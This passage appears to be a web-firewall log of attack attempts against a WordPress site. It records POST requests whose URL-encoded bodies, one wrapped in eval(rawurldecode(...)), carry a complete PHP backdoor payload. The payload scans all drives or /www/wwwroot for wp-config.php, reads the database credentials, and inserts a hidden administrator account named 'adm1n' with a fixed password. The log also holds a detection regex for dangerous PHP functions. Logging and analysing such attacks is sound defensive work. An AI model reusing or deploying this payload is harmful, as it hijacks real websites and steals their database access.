20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 06:04:33","213.209.159.254","POST","\/wp-admin\/site-health.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.64 Safari\/537.36 Edg\/101.0.1210.47","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> hs:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-admin\/site-health.php HTTP\/1.1\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.64 Safari\/537.36 Edg\/101.0.1210.47\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncookie:4=3a8677dc156d672c6e12f16237adcc36; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvnUZvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaOupzkyK3Ein2IhplV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"101\", \"Microsoft Edge\";v=\"101\"\ncontent-type:application\/x-www-form-urlencoded\nsec-ch-ua-mobile:?0\ncontent-length:12640\n\nhs=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 06:04:49","213.209.159.254","POST","\/wp-includes\/html-api\/class-wp-html-token.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.64 Safari\/537.36 Edg\/101.0.1210.47","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> etswnK:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SE